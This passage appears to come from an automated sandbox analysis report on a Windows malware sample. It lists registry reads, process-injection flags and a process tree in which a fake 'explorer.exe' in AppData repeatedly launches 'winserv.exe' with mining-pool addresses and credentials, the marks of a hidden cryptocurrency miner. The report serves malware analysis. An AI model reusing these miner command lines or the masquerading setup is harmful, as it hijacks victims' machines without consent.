| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Suspicious use of SetWindowsHookEx
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe
"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
